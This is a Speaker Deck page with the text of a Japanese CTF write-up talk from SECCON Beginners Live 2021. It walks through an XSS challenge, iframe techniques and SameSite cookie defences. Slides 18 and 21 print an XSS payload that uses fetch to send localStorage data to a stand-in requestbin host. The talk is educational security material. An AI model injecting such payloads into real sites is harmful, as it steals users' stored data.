Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021
Search
Hi120ki
October 17, 2021
Technology
0
1.1k
Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021
SECCON Beginners Live 2021 発表スライド
https://connpass.com/event/225707/
Hi120ki
October 17, 2021
Tweet
Share
More Decks by Hi120ki
See All by Hi120ki
MCPの認証と認可 - MCP Meetup Tokyo 2025
hi120ki
18
13k
運用して初めてわかったDevinのセキュリティ課題 - Devin Meetup Tokyo 2025
hi120ki
11
7.6k
SECCON13 - SECCON Beginners Workshop - Reversing
hi120ki
0
220
Reversing基礎編 / Basics of Reversing - SECCON Beginners Live 2022
hi120ki
5
2.1k
CTF大会開催はいいぞ。- 魔女のお茶会 2021冬 / Guide for holding CTF events
hi120ki
2
1.5k
Other Decks in Technology
See All in Technology
システムのアラート調査をサポートするAI Agentの紹介/Introduction to an AI Agent for System Alert Investigation
taddy_919
2
1.2k
SMTP完全に理解した ✉️
yamatai1212
0
160
レガシー共有バッチ基盤への挑戦 - SREドリブンなリアーキテクチャリングの取り組み
tatsukoni
0
130
20260129_CB_Kansai
takuyay0ne
1
250
学生・新卒・ジュニアから目指すSRE
hiroyaonoe
1
340
GSIが複数キー対応したことで、俺達はいったい何が嬉しいのか?
smt7174
3
120
JuliaTokaiとしてはこれが最後かもしれない(仮) for NGK2026S
antimon2
0
130
今日から始める Amazon Bedrock AgentCore
har1101
4
290
Regional_NAT_Gatewayについて_basicとの違い_試した内容スケールアウト_インについて_IPv6_dual_networkでの使い分けなど.pdf
cloudevcode
1
210
みんなだいすきALB、NLBの 仕組みから最新機能まで総おさらい / Mastering ALB & NLB: Internal Mechanics and Latest Innovations
kaminashi
0
170
いよいよ仕事を奪われそうな波が来たぜ
kazzpapa3
3
310
オープンウェイトのLLMリランカーを契約書で評価する / searchtechjp
sansan_randd
3
530
Featured
See All Featured
Lessons Learnt from Crawling 1000+ Websites
charlesmeaden
PRO
1
1.1k
職位にかかわらず全員がリーダーシップを発揮するチーム作り / Building a team where everyone can demonstrate leadership regardless of position
madoxten
55
49k
Heart Work Chapter 1 - Part 1
lfama
PRO
5
35k
Design of three-dimensional binary manipulators for pick-and-place task avoiding obstacles (IECON2024)
konakalab
0
350
Java REST API Framework Comparison - PWX 2021
mraible
34
9.1k
Paper Plane
katiecoart
PRO
0
46k
Fireside Chat
paigeccino
41
3.8k
Build your cross-platform service in a week with App Engine
jlugia
234
18k
Code Review Best Practice
trishagee
74
20k
DBのスキルで生き残る技術 - AI時代におけるテーブル設計の勘所
soudai
PRO
61
49k
Into the Great Unknown - MozCon
thekraken
40
2.2k
Navigating Algorithm Shifts & AI Overviews - #SMXNext
aleyda
0
1.1k
Transcript
Magic Web SECCON Beginners Live 2021 hi120ki
@hi120ki CTF Wani Hackase Web Reversing 2 2021 Reversing :
firmware Web : json, magic
Web Magic 3
Magic [Web Hard] : 31solve Web 5 • • 4
5 /
6 /
7 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
8 / URL
9 /
10 crawler/index.js puppeteer Node.js Chrome URL
11 2. FLAG 3. URL crawler/index.js 1.
12 FLAG nginx/html/static/index.js FLAG
13 FLAG JavaScript XSS( )
XSS 14 HTML Web HTML JavaScript Cookie Web
15 https://magic.quals.beginners.seccon.jp/ FLAG FLAG
16 https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG <script>…</script>
17 FLAG <script>…</script> FLAG https://magic.quals.beginners.seccon.jp/??????????
18 <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script> FLAG XSS URL
XSS 19 magic/views/index.ejs <script> </script>
20 alert(1)
21 FLAG URL <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script>
22 FLAG URL
23 XSS https://magic.quals.beginners.seccon.jp/
24 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS
25 ... + = ? XSS
26 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL <script>…</script> FLAG
27 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
28 URL
29 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ <script>…</script> FLAG XSS
30 FLAG 1. FLAG 2. 3.
31
1. XSS 2. 3. 32
1. XSS 2. 3. 33 FLAG
1. XSS 2. 3. 34
1. XSS 2. 3. 35
36 FLAG
XSS • • Byte Bandits CTF 2020 Notes App •
https://github.com/ByteBandits/bbctf-2020 37
Byte Bandits CTF 2020 Notes App 38 https://example.com/login?username= &password= •
FLAG iframe • • API
iframe 39 https://attacker.example.com/ iframe1 iframe2 URL iframe https://example.com/ https://example.com/ URL
iframe
iframe 40 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ iframe 2 iframe
iframe 41 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG <script>...</script> XSS
FLAG
iframe 42 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG FLAG (top.iframe1.document.body.innerHTML)
<script>...</script>
43 iframe SameSite Cookie None Lax
44 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=None iframe Cookie Cookie (session=nj49gn...)
FLAG
45 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=Lax iframe Cookie Cookie (session=nj49gn...)
FLAG
SameSite Cookie=Lax 46 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ Cookie Cookie
(session=nj49gn...) ✕ FLAG <script>...</script>
47 SameSite Cookie=None iframe CTF
48 Cookie : SameSite, HttpOnly, Secure... Content-Security-Policy X-Frame-Options ... (
XSS Content-Security-Policy )
49 FLAG +
50 Magic https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files Freepik from Flaticon https://www.flaticon.com/free-icon/hacker_924874 https://www.flaticon.com/free-icon/programmer_560216 https://www.flaticon.com/free-icon/flag_473724 writeup
https://hi120ki.github.io/blog/posts/20210523-3/
hi120ki
taddy_919
yamatai1212
tatsukoni
takuyay0ne
hiroyaonoe
smt7174
antimon2
har1101
cloudevcode
kaminashi
kazzpapa3
sansan_randd
charlesmeaden
madoxten
lfama
konakalab
mraible
katiecoart
paigeccino
jlugia
trishagee
soudai
thekraken
aleyda
![Magic [Web Hard] : 31solve Web 5 • • 4](https://files.speakerdeck.com/presentations/77735c51e4634f0ca2183b68d2995f18/slide_3.jpg){kind=link}
